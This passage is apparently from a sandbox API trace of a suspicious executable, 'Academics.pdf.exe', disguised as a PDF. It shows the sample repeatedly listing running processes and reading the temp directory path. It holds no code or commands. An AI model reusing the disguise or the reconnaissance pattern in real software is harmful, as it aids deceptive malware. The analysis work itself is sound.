th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0321.381] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0321.381] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0321.382] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0321.383] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0321.384] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.385] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0321.385] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.386] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0321.387] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 0 [0321.388] CloseHandle (hObject=0x294) returned 1 [0321.388] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0321.388] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0321.388] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0321.390] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0321.391] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0321.392] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0321.393] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0321.393] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0321.394] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0321.395] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0321.396] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0321.397] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0321.397] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0321.398] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.399] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.400] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.401] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.401] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.402] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0321.406] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.407] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.408] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0321.408] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0321.409] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0321.410] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0321.411] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.412] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0321.412] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0321.413] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0321.414] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0321.415] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0321.416] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0321.417] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0321.418] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0321.419] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0321.421] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0321.422] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0321.429] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0321.430] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0321.431] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0321.431] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0321.432] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0321.433] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0321.434] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0321.435] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0321.436] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.437] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0321.437] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.438] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0321.439] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 0 [0321.440] CloseHandle (hObject=0x294) returned 1 [0321.440] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0321.440] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0321.440] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0321.443] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0321.444] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0321.444] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0321.445] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0321.446] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0321.447] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0321.448] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0321.449] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0321.450] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0321.451] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0321.452] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.453] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.453] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.454] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.455] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.456] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0321.457] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.458] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.459] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0321.460] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0321.475] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0321.475] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0321.475] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0321.476] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0321.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0321.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0321.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaa8 [0321.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0321.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0321.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa310 [0321.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0321.476] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf2a0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0321.476] 